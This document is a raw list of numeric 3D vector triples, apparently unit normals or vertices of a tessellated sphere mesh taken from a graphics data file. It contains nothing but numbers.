[0.0,-0.724504590034,-0.689269959927],
[0.0781932324171,-0.632596552372,-0.770524084568],
[-0.0801787301898,-0.129731908441,-0.988302052021],
[0.0,-0.266404688358,-0.96386128664],
[0.0801787301898,-0.129731908441,-0.988302052021],
[-0.240536183119,-0.389195710421,-0.889195740223],
[-0.16035746038,-0.518927633762,-0.839642524719],
[-0.0823235809803,-0.39960706234,-0.912982463837],
[0.0823235809803,-0.39960706234,-0.912982463837],
[0.16035746038,-0.518927633762,-0.839642524719],
[0.240536183119,-0.389195710421,-0.889195740223],
[-0.0823235809803,-0.39960706234,-0.912982463837],
[0.0823235809803,-0.39960706234,-0.912982463837],
[0.0,-0.266404688358,-0.96386128664],
[-0.907272219658,-0.420543789864,0.0],
[-0.919883430004,-0.373140364885,-0.120750762522],
[-0.863953828812,-0.490634441376,-0.113409027457],
[-0.988273143768,-0.152696594596,0.0],
[-0.988302052021,-0.0801787301898,-0.129731908441],
[-0.963828444481,-0.234579697251,-0.126519307494],
[-0.915502369404,-0.312772929668,-0.253038614988],
[-0.889195740223,-0.240536183119,-0.389195710421],
[-0.846715569496,-0.381741464138,-0.370602428913],
[-0.963828444481,-0.234579697251,-0.126519307494],
[-0.915502369404,-0.312772929668,-0.253038614988],
[-0.919883430004,-0.373140364885,-0.120750762522],
[-0.988273143768,0.152696594596,0.0],
[-0.963828444481,0.234579697251,-0.126519307494],
[-0.988302052021,0.0801787301898,-0.129731908441],
[-0.907272219658,0.420543789864,0.0],
[-0.863953828812,0.490634441376,-0.113409027457],
[-0.919883430004,0.373140364885,-0.120750762522],
[-0.915502369404,0.312772929668,-0.253038614988],
[-0.846715569496,0.381741464138,-0.370602428913],
[-0.889195740223,0.240536183119,-0.389195710421],
[-0.919883430004,0.373140364885,-0.120750762522],
[-0.915502369404,0.312772929668,-0.253038614988],
[-0.963828444481,0.234579697251,-0.126519307494],
[-0.839642524719,-0.16035746038,-0.518927633762],
[-0.770524084568,-0.0781932324171,-0.632596552372],
[-0.752343893051,-0.229044884443,-0.617670714855],
[-0.839642524719,0.16035746038,-0.518927633762],
[-0.752343893051,0.229044884443,-0.617670714855],
[-0.770524084568,0.0781932324171,-0.632596552372],
[-0.689269959927,0.0,-0.724504590034],
[-0.604043483734,0.070090636611,-0.793863236904],
[-0.604043483734,-0.070090636611,-0.793863236904],
[-0.770524084568,0.0781932324171,-0.632596552372],
[-0.689269959927,0.0,-0.724504590034],
[-0.770524084568,-0.0781932324171,-0.632596552372],
[-0.988302052021,0.0801787301898,-0.129731908441],
[-0.96386128664,0.0,-0.266404688358],
[-0.988302052021,-0.0801787301898,-0.129731908441],
[-0.889195740223,0.240536183119,-0.389195710421],
[-0.839642524719,0.16035746038,-0.518927633762],
[-0.912982463837,0.0823235809803,-0.39960706234],
[-0.912982463837,-0.0823235809803,-0.39960706234],
[-0.839642524719,-0.16035746038,-0.518927633762],
[-0.889195740223,-0.240536183119,-0.389195710421],
[-0.912982463837,0.0823235809803,-0.39960706234],
[-0.912982463837,-0.0823235809803,-0.39960706234],
[-0.96386128664,0.0,-0.266404688358],
[-0.793863236904,0.604043483734,-0.070090636611],
[-0.79913264513,0.568519234657,-0.19537883997],
[-0.863953828812,0.490634441376,-0.113409027457],
[-0.617670714855,0.752343893051,-0.229044884443],
[-0.599106371403,0.70991063118,-0.370268076658],
[-0.71078979969,0.644004821777,-0.28290578723],
[-0.788983047009,0.517485499382,-0.331231862307],
[-0.759463787079,0.450446814299,-0.469374448061],
[-0.846715569496,0.381741464138,-0.370602428913],
[-0.71078979969,0.644004821777,-0.28290578723],
[-0.788983047009,0.517485499382,-0.331231862307],
[-0.79913264513,0.568519234657,-0.19537883997],
[-0.370602428913,0.846715569496,-0.381741464138],
[-0.331231862307,0.788983047009,-0.517485499382],
[-0.469374448061,0.759463787079,-0.450446814299],
[-0.113409027457,0.863953828812,-0.490634441376],
[-0.070090636611,0.793863236904,-0.604043483734],
[-0.19537883997,0.79913264513,-0.568519234657],
[-0.28290578723,0.71078979969,-0.644004821777],
[-0.229044884443,0.617670714855,-0.752343893051],
[-0.370268076658,0.599106371403,-0.70991063118],
[-0.19537883997,0.79913264513,-0.568519234657],
[-0.28290578723,0.71078979969,-0.644004821777],
[-0.331231862307,0.788983047009,-0.517485499382],
[-0.70991063118,0.370268076658,-0.599106371403],
[-0.644004821777,0.28290578723,-0.71078979969],
[-0.752343893051,0.229044884443,-0.617670714855],
[-0.450446814299,0.469374448061,-0.759463787079],
[-0.381741464138,0.370602428913,-0.846715569496],
[-0.517485499382,0.331231862307,-0.788983047009],
[-0.568519234657,0.19537883997,-0.79913264513],
[-0.490634441376,0.113409027457,-0.863953828812],
[-0.604043483734,0.070090636611,-0.793863236904],
[-0.517485499382,0.331231862307,-0.788983047009],
[-0.568519234657,0.19537883997,-0.79913264513],
[-0.644004821777,0.28290578723,-0.71078979969],
[-0.469374448061,0.759463787079,-0.450446814299],
[-0.5642542243,0.646577775478,-0.513375461102],
[-0.599106371403,0.70991063118,-0.370268076658],
[-0.370268076658,0.599106371403,-0.70991063118],
[-0.450446814299,0.469374448061,-0.759463787079],
[-0.513375461102,0.5642542243,-0.646577775478],
[-0.646577775478,0.513375461102,-0.5642542243],
[-0.70991063118,0.370268076658,-0.599106371403],
[-0.759463787079,0.450446814299,-0.469374448061],
[-0.513375461102,0.5642542243,-0.646577775478],
[-0.646577775478,0.513375461102,-0.5642542243],
[-0.5642542243,0.646577775478,-0.513375461102],
[0.420543789864,0.0,-0.907272219658],
[0.373140364885,0.120750762522,-0.919883430004],
[0.490634441376,0.113409027457,-0.863953828812],
[0.152696594596,0.0,-0.988273143768],
[0.0801787301898,0.129731908441,-0.988302052021],
[0.234579697251,0.126519307494,-0.963828444481],
[0.312772929668,0.253038614988,-0.915502369404],
[0.240536183119,0.389195710421,-0.889195740223],
[0.381741464138,0.370602428913,-0.846715569496],
[0.234579697251,0.126519307494,-0.963828444481],
[0.312772929668,0.253038614988,-0.915502369404],
[0.373140364885,0.120750762522,-0.919883430004],
[-0.152696594596,0.0,-0.988273143768],
[-0.234579697251,0.126519307494,-0.963828444481],
[-0.0801787301898,0.129731908441,-0.988302052021],
[-0.420543789864,0.0,-0.907272219658],
[-0.490634441376,0.113409027457,-0.863953828812],
[-0.373140364885,0.120750762522,-0.919883430004],
[-0.312772929668,0.253038614988,-0.915502369404],
[-0.381741464138,0.370602428913,-0.846715569496],
[-0.240536183119,0.389195710421,-0.889195740223],
[-0.373140364885,0.120750762522,-0.919883430004],
[-0.312772929668,0.253038614988,-0.915502369404],
[-0.234579697251,0.126519307494,-0.963828444481],
[0.16035746038,0.518927633762,-0.839642524719],
[0.0781932324171,0.632596552372,-0.770524084568],
[0.229044884443,0.617670714855,-0.752343893051],
[-0.16035746038,0.518927633762,-0.839642524719],
[-0.229044884443,0.617670714855,-0.752343893051],
[-0.0781932324171,0.632596552372,-0.770524084568],
[0.0,0.724504590034,-0.689269959927],
[-0.070090636611,0.793863236904,-0.604043483734],
[0.070090636611,0.793863236904,-0.604043483734],
[-0.0781932324171,0.632596552372,-0.770524084568],
[0.0,0.724504590034,-0.689269959927],
[0.0781932324171,0.632596552372,-0.770524084568],
[-0.0801787301898,0.129731908441,-0.988302052021],
[0.0,0.266404688358,-0.96386128664],
[0.0801787301898,0.129731908441,-0.988302052021],
[-0.240536183119,0.389195710421,-0.889195740223],
[-0.16035746038,0.518927633762,-0.839642524719],
[-0.0823235809803,0.39960706234,-0.912982463837],
[0.0823235809803,0.39960706234,-0.912982463837],
[0.16035746038,0.518927633762,-0.839642524719],
[0.240536183119,0.389195710421,-0.889195740223],
[-0.0823235809803,0.39960706234,-0.912982463837],
[0.0823235809803,0.39960706234,-0.912982463837],
[0.0,0.266404688358,-0.96386128664],
[0.490634441376,0.113409027457,-0.863953828812],
[0.568519234657,0.19537883997,-0.79913264513],
[0.604043483734,0.070090636611,-0.793863236904],
[0.381741464138,0.370602428913,-0.846715569496],
[0.450446814299,0.469374448061,-0.759463787079],
[0.517485499382,0.331231862307,-0.788983047009],
[0.644004821777,0.28290578723,-0.71078979969],
[0.70991063118,0.370268076658,-0.599106371403],
[0.752343893051,0.229044884443,-0.617670714855],
[0.517485499382,0.331231862307,-0.788983047009],
[0.644004821777,0.28290578723,-0.71078979969],
[0.568519234657,0.19537883997,-0.79913264513],
[0.229044884443,0.617670714855,-0.752343893051],
[0.28290578723,0.71078979969,-0.644004821777],
[0.370268076658,0.599106371403,-0.70991063118],
[0.070090636611,0.793863236904,-0.604043483734],
[0.113409027457,0.863953828812,-0.490634441376],
[0.19537883997,0.79913264513,-0.568519234657],
[0.331231862307,0.788983047009,-0.517485499382],
[0.370602428913,0.846715569496,-0.381741464138],
[0.469374448061,0.759463787079,-0.450446814299],
[0.19537883997,0.79913264513,-0.568519234657],
[0.331231862307,0.788983047009,-0.517485499382],
[0.28290578723,0.71078979969,-0.644004821777],
[0.759463787079,0.450446814299,-0.469374448061],
[0.788983047009,0.517485499382,-0.331231862307],
[0.846715569496,0.381741464138,-0.370602428913],
[0.599106371403,0.70991063118,-0.370268076658],
[0.617670714855,0.752343893051,-0.229044884443],
[0.71078979969,0.644004821777,-0.28290578723],
[0.79913264513,0.568519234657,-0.19537883997],
[0.793863236904,0.604043483734,-0.070090636611],
[0.863953828812,0.490634441376,-0.113409027457],
[0.71078979969,0.644004821777,-0.28290578723],
[0.79913264513,0.568519234657,-0.19537883997],
[0.788983047009,0.517485499382,-0.331231862307],
[0.370268076658,0.599106371403,-0.70991063118],
[0.513375461102,0.5642542243,-0.646577775478],
[0.450446814299,0.469374448061,-0.759463787079],
[0.469374448061,0.759463787079,-0.450446814299],
[0.599106371403,0.70991063118,-0.370268076658],
[0.5642542243,0.646577775478,-0.513375461102],
[0.646577775478,0.513375461102,-0.5642542243],
[0.759463787079,0.450446814299,-0.469374448061],
[0.70991063118,0.370268076658,-0.599106371403],
[0.5642542243,0.646577775478,-0.513375461102],
[0.646577775478,0.513375461102,-0.5642542243],
[0.513375461102,0.5642542243,-0.646577775478],
[0.793863236904,0.604043483734,-0.070090636611],
[0.724504590034,0.689269959927,0.0],
[0.793863236904,0.604043483734,0.070090636611],
[0.617670714855,0.752343893051,-0.229044884443],
[0.518927633762,0.839642524719,-0.16035746038],
[0.632596552372,0.770524084568,-0.0781932324171],
[0.632596552372,0.770524084568,0.0781932324171],
[0.518927633762,0.839642524719,0.16035746038],
[0.617670714855,0.752343893051,0.229044884443],
[0.632596552372,0.770524084568,-0.0781932324171],
[0.632596552372,0.770524084568,0.0781932324171],
[0.724504590034,0.689269959927,0.0],
[0.370602428913,0.846715569496,-0.381741464138],
[0.253038614988,0.915502369404,-0.312772929668],
[0.389195710421,0.889195740223,-0.240536183119],
[0.113409027457,0.863953828812,-0.490634441376],
[0.0,0.907272219658,-0.420543789864],
[0.120750762522,0.919883430004,-0.373140364885],
[0.126519307494,0.963828444481,-0.234579697251],
[0.0,0.988273143768,-0.152696594596],
[0.129731908441,0.988302052021,-0.0801787301898],
[0.120750762522,0.919883430004,-0.373140364885],
[0.126519307494,0.963828444481,-0.234579697251],
[0.253038614988,0.915502369404,-0.312772929668],
[0.389195710421,0.889195740223,0.240536183119],
[0.253038614988,0.915502369404,0.312772929668],
[0.370602428913,0.846715569496,0.381741464138],
[0.129731908441,0.988302052021,0.0801787301898],
[0.0,0.988273143768,0.152696594596],
[0.126519307494,0.963828444481,0.234579697251],
[0.120750762522,0.919883430004,0.373140364885],
[0.0,0.907272219658,0.420543789864],
[0.113409027457,0.863953828812,0.490634441376],
[0.126519307494,0.963828444481,0.234579697251],
[0.120750762522,0.919883430004,0.373140364885],
[0.253038614988,0.915502369404,0.312772929668],
[0.389195710421,0.889195740223,-0.240536183119],
[0.39960706234,0.912982463837,-0.0823235809803],
[0.518927633762,0.839642524719,-0.16035746038],
[0.129731908441,0.988302052021,-0.0801787301898],
[0.129731908441,0.988302052021,0.0801787301898],
[0.266404688358,0.96386128664,0.0],
[0.39960706234,0.912982463837,0.0823235809803],
[0.389195710421,0.889195740223,0.240536183119],
[0.518927633762,0.839642524719,0.16035746038],
[0.266404688358,0.96386128664,0.0],
[0.39960706234,0.912982463837,0.0823235809803],
[0.39960706234,0.912982463837,-0.0823235809803],
[0.793863236904,0.604043483734,0.070090636611],
[0.79913264513,0.568519234657,0.19537883997],
[0.863953828812,0.490634441376,0.113409027457],
[0.617670714855,0.752343893051,0.229044884443],
[0.599106371403,0.70991063118,0.370268076658],
[0.71078979969,0.644004821777,0.28290578723],
[0.788983047009,0.517485499382,0.331231862307],
[0.759463787079,0.450446814299,0.469374448061],
[0.846715569496,0.381741464138,0.370602428913],
[0.71078979969,0.644004821777,0.28290578723],
[0.788983047009,0.517485499382,0.331231862307],
[0.79913264513,0.568519234657,0.19537883997],
[0.370602428913,0.846715569496,0.381741464138],
[0.331231862307,0.788983047009,0.517485499382],
[0.469374448061,0.759463787079,0.450446814299],
[0.113409027457,0.863953828812,0.490634441376],
[0.070090636611,0.793863236904,0.604043483734],
[0.19537883997,0.79913264513,0.568519234657],
[0.28290578723,0.71078979969,0.644004821777],
[0.229044884443,0.617670714855,0.752343893051],
[0.370268076658,0.599106371403,0.70991063118],
[0.19537883997,0.79913264513,0.568519234657],
[0.28290578723,0.71078979969,0.644004821777],
[0.331231862307,0.788983047009,0.517485499382],
[0.70991063118,0.370268076658,0.599106371403],
[0.644004821777,0.28290578723,0.71078979969],
[0.752343893051,0.229044884443,0.617670714855],
[0.450446814299,0.469374448061,0.759463787079],
[0.381741464138,0.370602428913,0.846715569496],
[0.517485499382,0.331231862307,0.788983047009],
[0.568519234657,0.19537883997,0.79913264513],
[0.490634441376,0.113409027457,0.863953828812],
[0.604043483734,0.070090636611,0.793863236904],
[0.517485499382,0.331231862307,0.788983047009],
[0.568519234657,0.19537883997,0.79913264513],
[0.644004821777,0.28290578723,0.71078979969],
[0.469374448061,0.759463787079,0.450446814299],
[0.5642542243,0.646577775478,0.513375461102],
[0.599106371403,0.70991063118,0.370268076658],
[0.370268076658,0.599106371403,0.70991063118],
[0.450446814299,0.469374448061,0.759463787079],
[0.513375461102,0.5642542243,0.646577775478],
[0.646577775478,0.513375461102,0.5642542243],
[0.70991063118,0.370268076658,0.599106371403],
[0.759463787079,0.450446814299,0.469374448061],
[0.513375461102,0.5642542243,0.646577775478],
[0.646577775478,0.513375461102,0.5642542243],
[0.5642542243,0.646577775478,0.513375461102],
[0.907272219658,-0.420543789864,0.0],
[0.919883430004,-0.373140364885,0.120750762522],
[0.863953828812,-0.490634441376,0.113409027457],
[0.988273143768,-0.152696594596,0.0],
[0.988302052021,-0.0801787301898,0.129731908441],
[0.963828444481,-0.234579697251,0.126519307494],
[0.915502369404,-0.312772929668,0.253038614988],
[0.889195740223,-0.240536183119,0.389195710421],
[0.846715569496,-0.381741464138,0.370602428913],
[0.963828444481,-0.234579697251,0.126519307494],
[0.915502369404,-0.312772929668,0.253038614988],
[0.919883430004,-0.373140364885,0.120750762522],
[0.988273143768,0.152696594596,0.0],
[0.963828444481,0.234579697251,0.126519307494],
[0.988302052021,0.0801787301898,0.129731908441],
[0.907272219658,0.420543789864,0.0],
[0.863953828812,0.490634441376,0.113409027457],
[0.919883430004,0.373140364885,0.120750762522],
[0.915502369404,0.312772929668,0.253038614988],
[0.846715569496,0.381741464138,0.370602428913],
[0.889195740223,0.240536183119,0.389195710421],
[0.919883430004,0.373140364885,0.120750762522],
[0.915502369404,0.312772929668,0.253038614988],
[0.963828444481,0.234579697251,0.126519307494],
[0.839642524719,-0.16035746038,0.518927633762],
[0.770524084568,-0.0781932324171,0.632596552372],
[0.752343893051,-0.229044884443,0.617670714855],
[0.839642524719,0.16035746038,0.518927633762],
[0.752343893051,0.229044884443,0.617670714855],
[0.770524084568,0.0781932324171,0.632596552372],
[0.689269959927,0.0,0.724504590034],
[0.604043483734,0.070090636611,0.793863236904],
[0.604043483734,-0.070090636611,0.793863236904],
[0.770524084568,0.0781932324171,0.632596552372],
[0.689269959927,0.0,0.724504590034],
[0.770524084568,-0.0781932324171,0.632596552372],
[0.988302052021,0.0801787301898,0.129731908441],
[0.96386128664,0.0,0.266404688358],
[0.988302052021,-0.0801787301898,0.129731908441],
[0.889195740223,0.240536183119,0.389195710421],
[0.839642524719,0.16035746038,0.518927633762],
[0.912982463837,0.0823235809803,0.39960706234],
[0.912982463837,-0.0823235809803,0.39960706234],
[0.839642524719,-0.16035746038,0.518927633762],
[0.889195740223,-0.240536183119,0.389195710421],
[0.912982463837,0.0823235809803,0.39960706234],
[0.912982463837,-0.0823235809803,0.39960706234],
[0.96386128664,0.0,0.266404688358],
[-0.604043483734,0.070090636611,0.793863236904],
[-0.689269959927,0.0,0.724504590034],
[-0.604043483734,-0.070090636611,0.793863236904],
[-0.752343893051,0.229044884443,0.617670714855],
[-0.839642524719,0.16035746038,0.518927633762],
[-0.770524084568,0.0781932324171,0.632596552372],
[-0.770524084568,-0.0781932324171,0.632596552372],
[-0.839642524719,-0.16035746038,0.518927633762],
[-0.752343893051,-0.229044884443,0.617670714855],
[-0.770524084568,0.0781932324171,0.632596552372],
[-0.770524084568,-0.0781932324171,0.632596552372],
[-0.689269959927,0.0,0.724504590034],
[-0.846715569496,0.381741464138,0.370602428913],
[-0.915502369404,0.312772929668,0.253038614988],
[-0.889195740223,0.240536183119,0.389195710421],
[-0.863953828812,0.490634441376,0.113409027457],
[-0.907272219658,0.420543789864,0.0],
[-0.919883430004,0.373140364885,0.120750762522],
[-0.963828444481,0.234579697251,0.126519307494],
[-0.988273143768,0.152696594596,0.0],
[-0.988302052021,0.0801787301898,0.129731908441],
[-0.919883430004,0.373140364885,0.120750762522],
[-0.963828444481,0.234579697251,0.126519307494],
[-0.915502369404,0.312772929668,0.253038614988],
[-0.889195740223,-0.240536183119,0.389195710421],
[-0.915502369404,-0.312772929668,0.253038614988],
[-0.846715569496,-0.381741464138,0.370602428913],
[-0.988302052021,-0.0801787301898,0.129731908441],
[-0.988273143768,-0.152696594596,0.0],
[-0.963828444481,-0.234579697251,0.126519307494],
[-0.919883430004,-0.373140364885,0.120750762522],
[-0.907272219658,-0.420543789864,0.0],
[-0.863953828812,-0.490634441376,0.113409027457],
[-0.963828444481,-0.234579697251,0.126519307494],
[-0.919883430004,-0.373140364885,0.120750762522],
[-0.915502369404,-0.312772929668,0.253038614988],
[-0.889195740223,0.240536183119,0.389195710421],
[-0.912982463837,0.0823235809803,0.39960706234],
[-0.839642524719,0.16035746038,0.518927633762],
[-0.988302052021,0.0801787301898,0.129731908441],
[-0.988302052021,-0.0801787301898,0.129731908441],
[-0.96386128664,0.0,0.266404688358],
[-0.912982463837,-0.0823235809803,0.39960706234],
[-0.889195740223,-0.240536183119,0.389195710421],
[-0.839642524719,-0.16035746038,0.518927633762],
[-0.96386128664,0.0,0.266404688358],
[-0.912982463837,-0.0823235809803,0.39960706234],
[-0.912982463837,0.0823235809803,0.39960706234],
[-0.490634441376,0.113409027457,0.863953828812],
[-0.568519234657,0.19537883997,0.79913264513],
[-0.604043483734,0.070090636611,0.793863236904],
[-0.381741464138,0.370602428913,0.846715569496],
[-0.450446814299,0.469374448061,0.759463787079],
[-0.517485499382,0.331231862307,0.788983047009],
[-0.644004821777,0.28290578723,0.71078979969],
[-0.70991063118,0.370268076658,0.599106371403],
[-0.752343893051,0.229044884443,0.617670714855],
[-0.517485499382,0.331231862307,0.788983047009],
[-0.644004821777,0.28290578723,0.71078979969],
[-0.568519234657,0.19537883997,0.79913264513],
[-0.229044884443,0.617670714855,0.752343893051],
[-0.28290578723,0.71078979969,0.644004821777],
[-0.370268076658,0.599106371403,0.70991063118],
[-0.070090636611,0.793863236904,0.604043483734],
[-0.113409027457,0.863953828812,0.490634441376],
[-0.19537883997,0.79913264513,0.568519234657],
[-0.331231862307,0.788983047009,0.517485499382],
[-0.370602428913,0.846715569496,0.381741464138],
[-0.469374448061,0.759463787079,0.450446814299],
[-0.19537883997,0.79913264513,0.568519234657],
[-0.331231862307,0.788983047009,0.517485499382],
[-0.28290578723,0.71078979969,0.644004821777],
[-0.759463787079,0.450446814299,0.469374448061],
[-0.788983047009,0.517485499382,0.331231862307],
[-0.846715569496,0.381741464138,0.370602428913],
[-0.599106371403,0.70991063118,0.370268076658],
[-0.617670714855,0.752343893051,0.229044884443],
[-0.71078979969,0.644004821777,0.28290578723],
[-0.79913264513,0.568519234657,0.19537883997],
[-0.793863236904,0.604043483734,0.070090636611],
[-0.863953828812,0.490634441376,0.113409027457],
[-0.71078979969,0.644004821777,0.28290578723],
[-0.79913264513,0.568519234657,0.19537883997],
[-0.788983047009,0.517485499382,0.331231862307],
[-0.370268076658,0.599106371403,0.70991063118],
[-0.513375461102,0.5642542243,0.646577775478],
[-0.450446814299,0.469374448061,0.759463787079],
[-0.469374448061,0.759463787079,0.450446814299],
[-0.599106371403,0.70991063118,0.370268076658],
[-0.5642542243,0.646577775478,0.513375461102],
[-0.646577775478,0.513375461102,0.5642542243],
[-0.759463787079,0.450446814299,0.469374448061],
[-0.70991063118,0.370268076658,0.599106371403],
[-0.5642542243,0.646577775478,0.513375461102],
[-0.646577775478,0.513375461102,0.5642542243],
[-0.513375461102,0.5642542243,0.646577775478],
[-0.070090636611,0.793863236904,0.604043483734],
[0.0,0.724504590034,0.689269959927],
[0.070090636611,0.793863236904,0.604043483734],
[-0.229044884443,0.617670714855,0.752343893051],
[-0.16035746038,0.518927633762,0.839642524719],
[-0.0781932324171,0.632596552372,0.770524084568],
[0.0781932324171,0.632596552372,0.770524084568],
[0.16035746038,0.518927633762,0.839642524719],
[0.229044884443,0.617670714855,0.752343893051],
[-0.0781932324171,0.632596552372,0.770524084568],
[0.0781932324171,0.632596552372,0.770524084568],
[0.0,0.724504590034,0.689269959927],
[-0.381741464138,0.370602428913,0.846715569496],
[-0.312772929668,0.253038614988,0.915502369404],
[-0.240536183119,0.389195710421,0.889195740223],
[-0.490634441376,0.113409027457,0.863953828812],
[-0.420543789864,0.0,0.907272219658],
[-0.373140364885,0.120750762522,0.919883430004],
[-0.234579697251,0.126519307494,0.963828444481],
[-0.152696594596,0.0,0.988273143768],
[-0.0801787301898,0.129731908441,0.988302052021],
[-0.373140364885,0.120750762522,0.919883430004],
[-0.234579697251,0.126519307494,0.963828444481],
[-0.312772929668,0.253038614988,0.915502369404],
[0.240536183119,0.389195710421,0.889195740223],
[0.312772929668,0.253038614988,0.915502369404],
[0.381741464138,0.370602428913,0.846715569496],
[0.0801787301898,0.129731908441,0.988302052021],
[0.152696594596,0.0,0.988273143768],
[0.234579697251,0.126519307494,0.963828444481],
[0.373140364885,0.120750762522,0.919883430004],
[0.420543789864,0.0,0.907272219658],
[0.490634441376,0.113409027457,0.863953828812],
[0.234579697251,0.126519307494,0.963828444481],
[0.373140364885,0.120750762522,0.919883430004],
[0.312772929668,0.253038614988,0.915502369404],
[-0.240536183119,0.389195710421,0.889195740223],
[-0.0823235809803,0.39960706234,0.912982463837],
[-0.16035746038,0.518927633762,0.839642524719],
[-0.0801787301898,0.129731908441,0.988302052021],
[0.0801787301898,0.129731908441,0.988302052021],
[0.0,0.266404688358,0.96386128664],
[0.0823235809803,0.39960706234,0.912982463837],
[0.240536183119,0.389195710421,0.889195740223],
[0.16035746038,0.518927633762,0.839642524719],
[0.0,0.266404688358,0.96386128664],
[0.0823235809803,0.39960706234,0.912982463837],
[-0.0823235809803,0.39960706234,0.912982463837],
[-0.113409027457,0.863953828812,-0.490634441376],
[-0.120750762522,0.919883430004,-0.373140364885],
[0.0,0.907272219658,-0.420543789864],
[-0.370602428913,0.846715569496,-0.381741464138],
[-0.389195710421,0.889195740223,-0.240536183119],
[-0.253038614988,0.915502369404,-0.312772929668],
[-0.126519307494,0.963828444481,-0.234579697251],
[-0.129731908441,0.988302052021,-0.0801787301898],
[0.0,0.988273143768,-0.152696594596],
[-0.253038614988,0.915502369404,-0.312772929668],
[-0.126519307494,0.963828444481,-0.234579697251],
[-0.120750762522,0.919883430004,-0.373140364885],
[-0.617670714855,0.752343893051,-0.229044884443],
[-0.632596552372,0.770524084568,-0.0781932324171],
[-0.518927633762,0.839642524719,-0.16035746038],
[-0.793863236904,0.604043483734,-0.070090636611],
[-0.793863236904,0.604043483734,0.070090636611],
[-0.724504590034,0.689269959927,0.0],
[-0.632596552372,0.770524084568,0.0781932324171],
[-0.617670714855,0.752343893051,0.229044884443],
[-0.518927633762,0.839642524719,0.16035746038],
[-0.724504590034,0.689269959927,0.0],
[-0.632596552372,0.770524084568,0.0781932324171],
[-0.632596552372,0.770524084568,-0.0781932324171],
[-0.129731908441,0.988302052021,0.0801787301898],
[-0.126519307494,0.963828444481,0.234579697251],
[0.0,0.988273143768,0.152696594596],
[-0.389195710421,0.889195740223,0.240536183119],
[-0.370602428913,0.846715569496,0.381741464138],
[-0.253038614988,0.915502369404,0.312772929668],
[-0.120750762522,0.919883430004,0.373140364885],
[-0.113409027457,0.863953828812,0.490634441376],
[0.0,0.907272219658,0.420543789864],
[-0.253038614988,0.915502369404,0.312772929668],
[-0.120750762522,0.919883430004,0.373140364885],
[-0.126519307494,0.963828444481,0.234579697251],
[-0.518927633762,0.839642524719,-0.16035746038],
[-0.39960706234,0.912982463837,-0.0823235809803],
[-0.389195710421,0.889195740223,-0.240536183119],
[-0.518927633762,0.839642524719,0.16035746038],
[-0.389195710421,0.889195740223,0.240536183119],
[-0.39960706234,0.912982463837,0.0823235809803],
[-0.266404688358,0.96386128664,0.0],
[-0.129731908441,0.988302052021,0.0801787301898],
[-0.129731908441,0.988302052021,-0.0801787301898],
[-0.39960706234,0.912982463837,0.0823235809803],
[-0.266404688358,0.96386128664,0.0],
[-0.39960706234,0.912982463837,-0.0823235809803],
[0.604043483734,0.070090636611,-0.793863236904],
[0.689269959927,0.0,-0.724504590034],
[0.604043483734,-0.070090636611,-0.793863236904],
[0.752343893051,0.229044884443,-0.617670714855],
[0.839642524719,0.16035746038,-0.518927633762],
[0.770524084568,0.0781932324171,-0.632596552372],
[0.770524084568,-0.0781932324171,-0.632596552372],
[0.839642524719,-0.16035746038,-0.518927633762],
[0.752343893051,-0.229044884443,-0.617670714855],
[0.770524084568,0.0781932324171,-0.632596552372],
[0.770524084568,-0.0781932324171,-0.632596552372],
[0.689269959927,0.0,-0.724504590034],
[0.846715569496,0.381741464138,-0.370602428913],
[0.915502369404,0.312772929668,-0.253038614988],
[0.889195740223,0.240536183119,-0.389195710421],
[0.863953828812,0.490634441376,-0.113409027457],
[0.907272219658,0.420543789864,0.0],
[0.919883430004,0.373140364885,-0.120750762522],
[0.963828444481,0.234579697251,-0.126519307494],
[0.988273143768,0.152696594596,0.0],
[0.988302052021,0.0801787301898,-0.129731908441],
[0.919883430004,0.373140364885,-0.120750762522],
[0.963828444481,0.234579697251,-0.126519307494],
[0.915502369404,0.312772929668,-0.253038614988],
[0.889195740223,-0.240536183119,-0.389195710421],
[0.915502369404,-0.312772929668,-0.253038614988],
[0.846715569496,-0.381741464138,-0.370602428913],
[0.988302052021,-0.0801787301898,-0.129731908441],
[0.988273143768,-0.152696594596,0.0],
[0.963828444481,-0.234579697251,-0.126519307494],
[0.919883430004,-0.373140364885,-0.120750762522],
[0.907272219658,-0.420543789864,0.0],
[0.863953828812,-0.490634441376,-0.113409027457],
[0.963828444481,-0.234579697251,-0.126519307494],
[0.919883430004,-0.373140364885,-0.120750762522],
[0.915502369404,-0.312772929668,-0.253038614988],
[0.889195740223,0.240536183119,-0.389195710421],
[0.912982463837,0.0823235809803,-0.39960706234],
[0.839642524719,0.16035746038,-0.518927633762],
[0.988302052021,0.0801787301898,-0.129731908441],
[0.988302052021,-0.0801787301898,-0.129731908441],
[0.96386128664,0.0,-0.266404688358],
[0.912982463837,-0.0823235809803,-0.39960706234],
[0.889195740223,-0.240536183119,-0.389195710421],
[0.839642524719,-0.16035746038,-0.518927633762],
[0.96386128664,0.0,-0.266404688358],
[0.912982463837,-0.0823235809803,-0.39960706234],
[0.912982463837,0.0823235809803,-0.39960706234],
[-0.82464236021,-0.564633131027,0.0339771322906],
[-0.79582041502,-0.605532705784,0.0],
[-0.82464236021,-0.564633131027,-0.0339771322906],
[-0.757922053337,-0.643326640129,0.108097285032],
[-0.722495436668,-0.687358558178,0.0744211226702],
[-0.761889100075,-0.646693944931,0.0362210273743],
[-0.761889100075,-0.646693944931,-0.0362210273743],
[-0.722495436668,-0.687358558178,-0.0744211226702],
[-0.757922053337,-0.643326640129,-0.108097285032],
[-0.761889100075,-0.646693944931,0.0362210273743],
[-0.761889100075,-0.646693944931,-0.0362210273743],
[-0.79582041502,-0.605532705784,0.0],
[-0.669747889042,-0.718357801437,0.188148602843],
[-0.62687343359,-0.763553202152,0.154971644282],
[-0.677466154099,-0.726636230946,0.114190116525],
[-0.560828924179,-0.782811582088,0.269586592913],
[-0.510783493519,-0.826465010643,0.236761152744],
[-0.571085453033,-0.797127783298,0.196083456278],
[-0.578244268894,-0.807120084763,0.119124859571],
[-0.524005174637,-0.847858190536,0.0809632539749],
[-0.581926107407,-0.81225925684,0.0399611219764],
[-0.571085453033,-0.797127783298,0.196083456278],
[-0.578244268894,-0.807120084763,0.119124859571],
[-0.62687343359,-0.763553202152,0.154971644282],
[-0.677466154099,-0.726636230946,-0.114190116525],
[-0.62687343359,-0.763553202152,-0.154971644282],
[-0.669747889042,-0.718357801437,-0.188148602843],
[-0.581926107407,-0.81225925684,-0.0399611219764],
[-0.524005174637,-0.847858190536,-0.0809632539749],
[-0.578244268894,-0.807120084763,-0.119124859571],
[-0.571085453033,-0.797127783298,-0.196083456278],
[-0.510783493519,-0.826465010643,-0.236761152744],
[-0.560828924179,-0.782811582088,-0.269586592913],
